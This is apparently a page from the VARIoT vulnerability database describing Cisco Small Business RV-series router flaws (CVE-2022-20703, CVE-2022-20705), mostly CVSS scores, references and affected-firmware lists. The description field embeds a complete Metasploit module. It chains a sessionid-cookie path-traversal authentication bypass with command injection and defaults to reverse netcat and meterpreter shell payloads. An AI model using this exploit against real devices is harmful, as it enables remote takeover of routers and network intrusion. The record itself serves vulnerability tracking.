               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "Cisco has issued an update to correct this vulnerability.",
            trust: 1.4,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            title: "cisco-sa-smb-mult-vuln-KA9PK6D",
            trust: 0.8,
            url: "https://sec.cloudapps.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            title: "Cisco Small Business Buffer error vulnerability fix",
            trust: 0.6,
            url: "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=183257",
         },
         {
            title: "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            trust: 0.1,
            url: "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts&qid=cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            title: "Known Exploited Vulnerabilities Detector",
            trust: 0.1,
            url: "https://github.com/ostorlab/kev ",
         },
         {
            title: "CVE-2022-XXXX",
            trust: 0.1,
            url: "https://github.com/alphabugx/cve-2022-23305 ",
         },
         {
            title: "CVE-2022-XXXX",
            trust: 0.1,
            url: "https://github.com/alphabugx/cve-2022-rce ",
         },
         {
            title: "Threatpost",
            trust: 0.1,
            url: "https://threatpost.com/critical-cisco-bugs-vpn-routers-cyberattacks/178199/",
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-413",
         },
         {
            db: "ZDI",
            id: "ZDI-22-408",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20703",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004543",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-164",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-295",
            trust: 1,
         },
         {
            problemtype: "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
            trust: 0.8,
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2022-004543",
         },
         {
            db: "NVD",
            id: "CVE-2022-20703",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 3.1,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            trust: 2.4,
            url: "https://www.zerodayinitiative.com/advisories/zdi-22-408/",
         },
         {
            trust: 1.7,
            url: "https://www.zerodayinitiative.com/advisories/zdi-22-413/",
         },
         {
            trust: 1.4,
            url: "https://nvd.nist.gov/vuln/detail/cve-2022-20703",
         },
         {
            trust: 0.6,
            url: "https://www.cybersecurity-help.cz/vdb/sb2022020301",
         },
         {
            trust: 0.1,
            url: "https://cwe.mitre.org/data/definitions/295.html",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov",
         },
         {
            trust: 0.1,
            url: "https://threatpost.com/critical-cisco-bugs-vpn-routers-cyberattacks/178199/",
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-413",
         },
         {
            db: "ZDI",
            id: "ZDI-22-408",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20703",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004543",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-164",
         },
         {
            db: "NVD",
            id: "CVE-2022-20703",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "ZDI",
            id: "ZDI-22-413",
         },
         {
            db: "ZDI",
            id: "ZDI-22-408",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20703",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004543",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-164",
         },
         {
            db: "NVD",
            id: "CVE-2022-20703",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2022-02-22T00:00:00",
            db: "ZDI",
            id: "ZDI-22-413",
         },
         {
            date: "2022-02-22T00:00:00",
            db: "ZDI",
            id: "ZDI-22-408",
         },
         {
            date: "2022-02-10T00:00:00",
            db: "VULMON",
            id: "CVE-2022-20703",
         },
         {
            date: "2023-04-18T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2022-004543",
         },
         {
            date: "2022-02-03T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202202-164",
         },
         {
            date: "2022-02-10T18:15:09.197000",
            db: "NVD",
            id: "CVE-2022-20703",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2022-02-22T00:00:00",
            db: "ZDI",
            id: "ZDI-22-413",
         },
         {
            date: "2022-02-22T00:00:00",
            db: "ZDI",
            id: "ZDI-22-408",
         },
         {
            date: "2023-11-07T00:00:00",
            db: "VULMON",
            id: "CVE-2022-20703",
         },
         {
            date: "2023-04-18T04:41:00",
            db: "JVNDB",
            id: "JVNDB-2022-004543",
         },
         {
            date: "2023-06-28T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202202-164",
         },
         {
            date: "2023-11-07T03:42:40.330000",
            db: "NVD",
            id: "CVE-2022-20703",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "local",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202202-164",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Cisco Small Business RV  Series router out-of-bounds write vulnerability",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2022-004543",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "trust management problem",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202202-164",
         },
      ],
      trust: 0.6,
   },
}

var-202202-0325
Vulnerability from variot

Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV series router Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the configuration of the NGINX web server. When parsing the sessionid cookie, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to bypass authentication on the system. This access can then be used to pivot to other parts of the network. This module works on firmware versions 1.0.03.24 and below. }, 'License' => MSF_LICENSE, 'Platform' => ['linux', 'unix'], 'Author' => [ 'Biem Pham', # Vulnerability Discoveries 'Neterum', # Metasploit Module 'jbaines-r7' # Inspired from cisco_rv_series_authbypass_and_rce.rb ], 'DisclosureDate' => '2021-11-02', 'Arch' => [ARCH_CMD, ARCH_ARMLE], 'References' => [ ['CVE', '2022-20705'], # Authentication Bypass ['CVE', '2022-20707'], # Command Injection ['ZDI', '22-410'], # Authentication Bypass ['ZDI', '22-411'] # Command Injection ], 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'Payload' => { 'BadChars' => '\'#' }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_ARMLE], 'Type' => :linux_dropper, 'Payload' => { 'BadChars' => '\'#' }, 'CmdStagerFlavor' => [ 'wget', 'curl' ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'MeterpreterTryToFork' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options( [ OptString.new('TARGETURI', [true, 'Base path', '/']) ] ) end

# sessionid utilized later needs to be set to length # of 16 or exploit will fail. Tested with lengths # 14-17 def generate_session_id return Rex::Text.rand_text_alphanumeric(16) end

def check res = send_request_cgi({ 'method' => 'GET', 'uri' => '/upload', 'headers' => { 'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id } }, 10)

# A proper "upload" will trigger file creation. So the send_request_cgi call
# above is an incorrect "upload" call to avoid creating a file on disk. The router will return
# status code 405 Not Allowed if authentication has been bypassed by the above request. 
# The firmware containing this authentication bypass also contains the command injection
# vulnerability that will be abused during actual exploitation. Non-vulnerable
# firmware versions will respond with 403 Forbidden. 
if res.nil?
  return CheckCode::Unknown('The device did not respond to request packet.')
elsif res.code == 405
  return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')
elsif res.code == 403
  return CheckCode::Safe('The device is not vulnerable to exploitation.')
else # Catch-all
  return CheckCode::Unknown('The target responded in an unexpected way. Exploitation is unlikely.')
end

end

def execute_command(cmd, _opts = {}) res = send_exploit(cmd)

# Successful unix_cmd shells should not produce a response. 
# However if a response is returned, check the status code and return
# Failure::NotVulnerable if it is 403 Forbidden. 
if target['Type'] == :unix_cmd && res&.code == 403
  fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable')
end

if target['Type'] == :linux_dropper
  fail_with(Failure::Unreachable, 'The target did not respond') unless res
  fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
  begin
    body_json = res.get_json_document
    fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
  rescue JSON::ParserError => e
    print_error("Failed: #{e.class} - #{e.message}")
    fail_with(Failure::UnexpectedReply, 'Failed to parse the response returned from the server! Its possible the response may not be JSON!')
  end
end

print_good('Exploit successfully executed.')

end

def send_exploit(cmd) filename = Rex::Text.rand_text_alphanumeric(5..12) fileparam = Rex::Text.rand_text_alphanumeric(5..12) input = Rex::Text.rand_text_alphanumeric(5..12)

# sessionid utilized later needs to be set to length
# of 16 or exploit will fail. Tested with lengths
# 14-17
sessionid = Rex::Text.rand_text_alphanumeric(16)

filepath = '/tmp/upload.input' # This file must exist and be writeable by www-data so we just use the temporary upload file to prevent issues. 
pathparam = 'Configuration'

destination = "'; " + cmd + ' #'

multipart_form = Rex::MIME::Message.new
multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"')
multipart_form.add_part(filename, nil, nil, 'form-data; name="filename"')
multipart_form.add_part(pathparam, nil, nil, 'form-data; name="pathparam"')
multipart_form.add_part(fileparam, nil, nil, 'form-data; name="fileparam"')
multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"')
multipart_form.add_part(input, 'application/octet-stream', nil, format('form-data; name="input"; filename="%<filename>s"', filename: filename))

# Escaping "/tmp/upload/" folder that does not contain any other permanent files
send_request_cgi({
  'method' => 'POST',
  'uri' => '/upload',
  'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
  'headers' => {
    'Cookie' => 'sessionid =../../www/index.html; sessionid=' + sessionid
  },
  'data' => multipart_form.to_s
}, 10)

end

def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager(linemax: 120) end end end

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-202202-0325",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "rv340",
            scope: null,
            trust: 2.1,
            vendor: "cisco",
            version: null,
         },
         {
            model: "rv340w",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv340",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv345p",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv260p",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv160",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv345",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv260",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv160w",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv260w",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv160 vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260w wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv160w wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv345p dual wan gigabit poe vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260p vpn router with poe",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260 vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv345 dual wan gigabit vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340 dual wan gigabit vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340w dual wan gigabit wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-415",
         },
         {
            db: "ZDI",
            id: "ZDI-22-410",
         },
         {
            db: "ZDI",
            id: "ZDI-22-409",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004459",
         },
         {
            db: "NVD",
            id: "CVE-2022-20705",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2022-20705",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Bien Pham (@bienpnn) from Team Orca of Sea Security (security.sea.com)",
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-410",
         },
         {
            db: "ZDI",
            id: "ZDI-22-409",
         },
      ],
      trust: 1.4,
   },
   cve: "CVE-2022-20705",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "PARTIAL",
                  baseScore: 7.5,
                  confidentialityImpact: "PARTIAL",
                  exploitabilityScore: 10,
                  impactScore: 6.4,
                  integrityImpact: "PARTIAL",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "HIGH",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Partial",
                  baseScore: 7.5,
                  confidentialityImpact: "Partial",
                  exploitabilityScore: null,
                  id: "CVE-2022-20705",
                  impactScore: null,
                  integrityImpact: "Partial",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.9,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "ADJACENT",
                  author: "ZDI",
                  availabilityImpact: "HIGH",
                  baseScore: 8.8,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 2.8,
                  id: "CVE-2022-20705",
                  impactScore: 5.9,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1.4,
                  userInteraction: "NONE",
                  vectorString: "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.0",
               },
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 9.8,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 3.9,
                  impactScore: 5.9,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "ykramarz@cisco.com",
                  availabilityImpact: "HIGH",
                  baseScore: 10,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 3.9,
                  impactScore: 6,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 9.8,
                  baseSeverity: "Critical",
                  confidentialityImpact: "High",
                  exploitabilityScore: null,
                  id: "CVE-2022-20705",
                  impactScore: null,
                  integrityImpact: "High",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.0",
               },
               {
                  attackComplexity: "LOW",
                  attackVector: "ADJACENT",
                  author: "ZDI",
                  availabilityImpact: "NONE",
                  baseScore: 6.5,
                  baseSeverity: "MEDIUM",
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 2.8,
                  id: "CVE-2022-20705",
                  impactScore: 3.6,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 0.7,
                  userInteraction: "NONE",
                  vectorString: "AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2022-20705",
                  trust: 1.8,
                  value: "CRITICAL",
               },
               {
                  author: "ZDI",
                  id: "CVE-2022-20705",
                  trust: 1.4,
                  value: "HIGH",
               },
               {
                  author: "ykramarz@cisco.com",
                  id: "CVE-2022-20705",
                  trust: 1,
                  value: "CRITICAL",
               },
               {
                  author: "ZDI",
                  id: "CVE-2022-20705",
                  trust: 0.7,
                  value: "MEDIUM",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-202202-166",
                  trust: 0.6,
                  value: "CRITICAL",
               },
               {
                  author: "VULMON",
                  id: "CVE-2022-20705",
                  trust: 0.1,
                  value: "HIGH",
               },
            ],
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-415",
         },
         {
            db: "ZDI",
            id: "ZDI-22-410",
         },
         {
            db: "ZDI",
            id: "ZDI-22-409",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20705",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004459",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-166",
         },
         {
            db: "NVD",
            id: "CVE-2022-20705",
         },
         {
            db: "NVD",
            id: "CVE-2022-20705",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
